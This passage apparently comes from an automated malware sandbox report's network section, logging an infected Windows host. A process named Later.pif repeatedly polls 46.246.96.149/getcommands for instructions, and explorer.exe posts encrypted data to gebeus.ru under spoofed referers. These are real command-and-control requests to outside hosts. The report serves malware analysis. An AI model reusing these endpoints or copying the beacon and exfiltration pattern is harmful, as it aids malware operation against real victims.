                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      Set-Cookie: PHPSESSID=0b4r0idgjh4qnj3935fq63tkv9; path=/
                                      Upgrade: h2
                                      Vary: Accept-Encoding
                                      Data Raw: 64 0d 0a 7b 22 6d 73 67 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: d{"msg":false}0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      56192.168.2.54977146.246.96.149806584C:\Users\user\AppData\Local\Temp\78801\Later.pif
                                      TimestampBytes transferredDirectionData
                                      Jul 15, 2024 06:13:43.975990057 CEST179OUTPOST /getcommands HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 46.246.96.149
                                      Content-Length: 59
                                      Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 31 35
                                      Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=15
                                      Jul 15, 2024 06:13:44.678807974 CEST421INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Mon, 15 Jul 2024 04:13:44 GMT
                                      Content-Type: application/json
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Vary: Accept-Encoding
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      Set-Cookie: PHPSESSID=hs9ebbvb76so1vpvfbcilof7gm; path=/
                                      Upgrade: h2
                                      Vary: Accept-Encoding
                                      Data Raw: 64 0d 0a 7b 22 6d 73 67 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: d{"msg":false}0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      57192.168.2.54977246.246.96.149806584C:\Users\user\AppData\Local\Temp\78801\Later.pif
                                      TimestampBytes transferredDirectionData
                                      Jul 15, 2024 06:13:44.810122967 CEST179OUTPOST /getcommands HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 46.246.96.149
                                      Content-Length: 59
                                      Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 31 36
                                      Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=16
                                      Jul 15, 2024 06:13:45.519481897 CEST421INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Mon, 15 Jul 2024 04:13:45 GMT
                                      Content-Type: application/json
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Vary: Accept-Encoding
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      Set-Cookie: PHPSESSID=ijsen0ag2mf1b2hvk80ikt028l; path=/
                                      Upgrade: h2
                                      Vary: Accept-Encoding
                                      Data Raw: 64 0d 0a 7b 22 6d 73 67 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: d{"msg":false}0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      58192.168.2.549773186.101.193.110801028C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Jul 15, 2024 06:13:45.057849884 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://ifgnsbejriuwteg.com/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 190
                                      Host: gebeus.ru
                                      Jul 15, 2024 06:13:45.057887077 CEST190OUTData Raw: 3b 6e 57 19 f1 b9 1e 55 de de c3 04 72 77 7a b7 7e 0a bd 91 62 71 9e 67 0d 7e 72 e6 47 c5 b3 62 ed 56 b5 2e 75 69 23 10 ea 99 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 39 30 af fe
                                      Data Ascii: ;nWUrwz~bqg~rGbV.ui#?#1|J7 M@NA .[k,vu90QEPO`>8Z.|j>js\(C%Z>N;U^9O7v|V-'\Fp<u
                                      Jul 15, 2024 06:13:46.125993013 CEST151INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Mon, 15 Jul 2024 04:13:45 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 03 00 00 00 72 e8 84
                                      Data Ascii: r


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      59192.168.2.54977446.246.96.149806584C:\Users\user\AppData\Local\Temp\78801\Later.pif
                                      TimestampBytes transferredDirectionData
                                      Jul 15, 2024 06:13:45.638272047 CEST179OUTPOST /getcommands HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 46.246.96.149
                                      Content-Length: 59
                                      Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 31 37
                                      Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=17
                                      Jul 15, 2024 06:13:46.338176012 CEST421INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Mon, 15 Jul 2024 04:13:46 GMT
                                      Content-Type: application/json
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Vary: Accept-Encoding
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      Set-Cookie: PHPSESSID=0p7kalhv5b6qt3b9u0vrvtm8os; path=/
                                      Upgrade: h2
                                      Vary: Accept-Encoding
                                      Data Raw: 64 0d 0a 7b 22 6d 73 67 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: d{"msg":false}0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      60192.168.2.54977546.246.96.149806584C:\Users\user\AppData\Local\Temp\78801\Later.pif
                                      TimestampBytes transferredDirectionData
                                      Jul 15, 2024 06:13:46.460412979 CEST179OUTPOST /getcommands HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 46.246.96.149
                                      Content-Length: 59
                                      Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 31 38
                                      Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=18
                                      Jul 15, 2024 06:13:47.157293081 CEST421INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Mon, 15 Jul 2024 04:13:47 GMT
                                      Content-Type: application/json
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Vary: Accept-Encoding
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      Set-Cookie: PHPSESSID=ta16q6l8mgfuggn73dpo8dmir7; path=/
                                      Upgrade: h2
                                      Vary: Accept-Encoding
                                      Data Raw: 64 0d 0a 7b 22 6d 73 67 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: d{"msg":false}0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      61192.168.2.54977646.246.96.149806584C:\Users\user\AppData\Local\Temp\78801\Later.pif
                                      TimestampBytes transferredDirectionData
                                      Jul 15, 2024 06:13:47.300512075 CEST179OUTPOST /getcommands HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 46.246.96.149
                                      Content-Length: 59
                                      Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 31 39
                                      Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=19
                                      Jul 15, 2024 06:13:48.021713018 CEST421INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Mon, 15 Jul 2024 04:13:47 GMT
                                      Content-Type: application/json
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Vary: Accept-Encoding
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      Set-Cookie: PHPSESSID=61g6jfee9704o69ovkrtk14p68; path=/
                                      Upgrade: h2
                                      Vary: Accept-Encoding
                                      Data Raw: 64 0d 0a 7b 22 6d 73 67 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: d{"msg":false}0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      62192.168.2.54977746.246.96.149806584C:\Users\user\AppData\Local\Temp\78801\Later.pif
                                      TimestampBytes transferredDirectionData
                                      Jul 15, 2024 06:13:48.134089947 CEST179OUTPOST /getcommands HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 46.246.96.149
                                      Content-Length: 59
                                      Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 32 30
                                      Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=20
                                      Jul 15, 2024 06:13:48.822381973 CEST421INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Mon, 15 Jul 2024 04:13:48 GMT
                                      Content-Type: application/json
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Vary: Accept-Encoding
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      Set-Cookie: PHPSESSID=deoqqolamvv2taki0nf3aflq0h; path=/
                                      Upgrade: h2
                                      Vary: Accept-Encoding
                                      Data Raw: 64 0d 0a 7b 22 6d 73 67 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: d{"msg":false}0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      63192.168.2.54977846.246.96.149806584C:\Users\user\AppData\Local\Temp\78801\Later.pif
                                      TimestampBytes transferredDirectionData
                                      Jul 15, 2024 06:13:48.950762033 CEST179OUTPOST /getcommands HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 46.246.96.149
                                      Content-Length: 59
                                      Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 32 31
                                      Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=21
                                      Jul 15, 2024 06:13:49.629947901 CEST421INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Mon, 15 Jul 2024 04:13:49 GMT
                                      Content-Type: application/json
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Vary: Accept-Encoding
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      Set-Cookie: PHPSESSID=tikquem0h8gi3qsnf908nsf3mu; path=/
                                      Upgrade: h2
                                      Vary: Accept-Encoding
                                      Data Raw: 64 0d 0a 7b 22 6d 73 67 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: d{"msg":false}0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      64192.168.2.54977946.246.96.149806584C:\Users\user\AppData\Local\Temp\78801\Later.pif
                                      TimestampBytes transferredDirectionData
                                      Jul 15, 2024 06:13:49.748111963 CEST179OUTPOST /getcommands HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 46.246.96.149
                                      Content-Length: 59
                                      Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 32 32
                                      Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=22
                                      Jul 15, 2024 06:13:50.453068972 CEST421INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Mon, 15 Jul 2024 04:13:50 GMT
                                      Content-Type: application/json
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Vary: Accept-Encoding
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      Set-Cookie: PHPSESSID=bk449epbvhbse16qsnen6vdnlq; path=/
                                      Upgrade: h2
                                      Vary: Accept-Encoding
                                      Data Raw: 64 0d 0a 7b 22 6d 73 67 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: d{"msg":false}0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      65192.168.2.549780186.101.193.110801028C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Jul 15, 2024 06:13:50.484285116 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://dxpeojjvxfrbjrw.net/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 251
                                      Host: gebeus.ru
                                      Jul 15, 2024 06:13:50.484298944 CEST251OUTData Raw: 3b 6e 57 19 f1 b9 1e 55 de de c3 04 72 77 7a b7 7e 0a bd 91 62 71 9e 67 0d 7e 72 e6 47 c5 b3 62 ed 56 b5 2e 75 69 23 10 ea 99 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 29 38 c4 b7
                                      Data Ascii: ;nWUrwz~bqg~rGbV.ui#?#1|J7 M@NA .[k,vu)8M%Yp`3Cr2P5bqdKg<Bo+?}r57YnCh5W-{-'Lj5Lk!$6^
                                      Jul 15, 2024 06:13:51.529536009 CEST151INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Mon, 15 Jul 2024 04:13:51 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 03 00 00 00 72 e8 84
                                      Data Ascii: r


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      66192.168.2.54978146.246.96.149806584C:\Users\user\AppData\Local\Temp\78801\Later.pif
                                      TimestampBytes transferredDirectionData
                                      Jul 15, 2024 06:13:50.569794893 CEST179OUTPOST /getcommands HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 46.246.96.149
                                      Content-Length: 59
                                      Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 32 33
                                      Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=23
                                      Jul 15, 2024 06:13:51.288285017 CEST421INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Mon, 15 Jul 2024 04:13:51 GMT
                                      Content-Type: application/json
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Vary: Accept-Encoding
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      Set-Cookie: PHPSESSID=q406bdnfumo6d0p28dtgb9rtjl; path=/
                                      Upgrade: h2
                                      Vary: Accept-Encoding
                                      Data Raw: 64 0d 0a 7b 22 6d 73 67 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: d{"msg":false}0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      67192.168.2.54978246.246.96.149806584C:\Users\user\AppData\Local\Temp\78801\Later.pif
                                      TimestampBytes transferredDirectionData
                                      Jul 15, 2024 06:13:51.414341927 CEST179OUTPOST /getcommands HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 46.246.96.149
                                      Content-Length: 59
                                      Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 32 34
                                      Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=24
                                      Jul 15, 2024 06:13:52.118026018 CEST421INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Mon, 15 Jul 2024 04:13:52 GMT
                                      Content-Type: application/json
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Vary: Accept-Encoding
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      Set-Cookie: PHPSESSID=04a3rgn0gh7rifmm8bsnau83q9; path=/
                                      Upgrade: h2
                                      Vary: Accept-Encoding
                                      Data Raw: 64 0d 0a 7b 22 6d 73 67 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: d{"msg":false}0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      68192.168.2.54978346.246.96.149806584C:\Users\user\AppData\Local\Temp\78801\Later.pif
                                      TimestampBytes transferredDirectionData
                                      Jul 15, 2024 06:13:52.242655039 CEST179OUTPOST /getcommands HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 46.246.96.149
                                      Content-Length: 59
                                      Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 32 35
                                      Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=25
                                      Jul 15, 2024 06:13:52.949642897 CEST421INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Mon, 15 Jul 2024 04:13:52 GMT
                                      Content-Type: application/json
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Vary: Accept-Encoding
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      Set-Cookie: PHPSESSID=q0gndi7cnvn0boe12b78an6r6b; path=/
                                      Upgrade: h2
                                      Vary: Accept-Encoding
                                      Data Raw: 64 0d 0a 7b 22 6d 73 67 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: d{"msg":false}0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      69192.168.2.54978446.246.96.149806584C:\Users\user\AppData\Local\Temp\78801\Later.pif
                                      TimestampBytes transferredDirectionData
                                      Jul 15, 2024 06:13:53.070255041 CEST179OUTPOST /getcommands HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 46.246.96.149
                                      Content-Length: 59
                                      Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 32 36
                                      Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=26
                                      Jul 15, 2024 06:13:53.762818098 CEST421INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Mon, 15 Jul 2024 04:13:53 GMT
                                      Content-Type: application/json
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Vary: Accept-Encoding
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      Set-Cookie: PHPSESSID=mbctpm5gjlvd2bv8i9g8qosneg; path=/
                                      Upgrade: h2
                                      Vary: Accept-Encoding
                                      Data Raw: 64 0d 0a 7b 22 6d 73 67 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: d{"msg":false}0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      70192.168.2.54978546.246.96.149806584C:\Users\user\AppData\Local\Temp\78801\Later.pif
                                      TimestampBytes transferredDirectionData
                                      Jul 15, 2024 06:13:53.884634972 CEST179OUTPOST /getcommands HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 46.246.96.149
                                      Content-Length: 59
                                      Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 32 37
                                      Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=27
                                      Jul 15, 2024 06:13:54.628289938 CEST421INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Mon, 15 Jul 2024 04:13:54 GMT
                                      Content-Type: application/json
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Vary: Accept-Encoding
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      Set-Cookie: PHPSESSID=sdv0d7mvilccga7qmkki9e478r; path=/
                                      Upgrade: h2
                                      Vary: Accept-Encoding
                                      Data Raw: 64 0d 0a 7b 22 6d 73 67 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: d{"msg":false}0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      71192.168.2.54978646.246.96.149806584C:\Users\user\AppData\Local\Temp\78801\Later.pif
                                      TimestampBytes transferredDirectionData
                                      Jul 15, 2024 06:13:54.743530035 CEST179OUTPOST /getcommands HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 46.246.96.149
                                      Content-Length: 59
                                      Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 32 38
                                      Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=28
                                      Jul 15, 2024 06:13:55.453135967 CEST421INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Mon, 15 Jul 2024 04:13:55 GMT
                                      Content-Type: application/json
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Vary: Accept-Encoding
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      Set-Cookie: PHPSESSID=e0n7l2r6tc8jmd0pb49geh5kd8; path=/
                                      Upgrade: h2
                                      Vary: Accept-Encoding
                                      Data Raw: 64 0d 0a 7b 22 6d 73 67 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: d{"msg":false}0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      72192.168.2.54978746.246.96.149806584C:\Users\user\AppData\Local\Temp\78801\Later.pif
                                      TimestampBytes transferredDirectionData
                                      Jul 15, 2024 06:13:55.575823069 CEST179OUTPOST /getcommands HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 46.246.96.149
                                      Content-Length: 59
                                      Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 32 39
                                      Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=29
                                      Jul 15, 2024 06:13:56.286751986 CEST421INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Mon, 15 Jul 2024 04:13:56 GMT
                                      Content-Type: application/json
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Vary: Accept-Encoding
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      Set-Cookie: PHPSESSID=h8j7atfd9q9op56rmfsbbd5psi; path=/
                                      Upgrade: h2
                                      Vary: Accept-Encoding
                                      Data Raw: 64 0d 0a 7b 22 6d 73 67 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: d{"msg":false}0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      73192.168.2.549788186.101.193.110801028C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Jul 15, 2024 06:13:55.985775948 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://rklgpmbjqrvbpp.com/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 316
                                      Host: gebeus.ru
                                      Jul 15, 2024 06:13:55.985775948 CEST316OUTData Raw: 3b 6e 57 19 f1 b9 1e 55 de de c3 04 72 77 7a b7 7e 0a bd 91 62 71 9e 67 0d 7e 72 e6 47 c5 b3 62 ed 56 b5 2e 75 69 23 10 ea 99 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 34 4c fb 93
                                      Data Ascii: ;nWUrwz~bqg~rGbV.ui#?#1|J7 M@NA .[k,vu4L_vFB~5$xPdUB$<I1.<}).1g&%28 u`CJ)@4kAOq2B:YF%a[H
                                      Jul 15, 2024 06:13:57.048315048 CEST151INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Mon, 15 Jul 2024 04:13:56 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 03 00 00 00 72 e8 84
                                      Data Ascii: r


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      74192.168.2.54978946.246.96.149806584C:\Users\user\AppData\Local\Temp\78801\Later.pif
                                      TimestampBytes transferredDirectionData
                                      Jul 15, 2024 06:13:56.399029016 CEST179OUTPOST /getcommands HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 46.246.96.149
                                      Content-Length: 59
                                      Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 33 30
                                      Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=30
                                      Jul 15, 2024 06:13:57.085050106 CEST421INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Mon, 15 Jul 2024 04:13:56 GMT
                                      Content-Type: application/json
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Vary: Accept-Encoding
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      Set-Cookie: PHPSESSID=ta91scsrsq2urgombuk9pg6kmk; path=/
                                      Upgrade: h2
                                      Vary: Accept-Encoding
                                      Data Raw: 64 0d 0a 7b 22 6d 73 67 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: d{"msg":false}0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      75192.168.2.54979046.246.96.149806584C:\Users\user\AppData\Local\Temp\78801\Later.pif
                                      TimestampBytes transferredDirectionData
                                      Jul 15, 2024 06:13:57.216432095 CEST179OUTPOST /getcommands HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 46.246.96.149
                                      Content-Length: 59
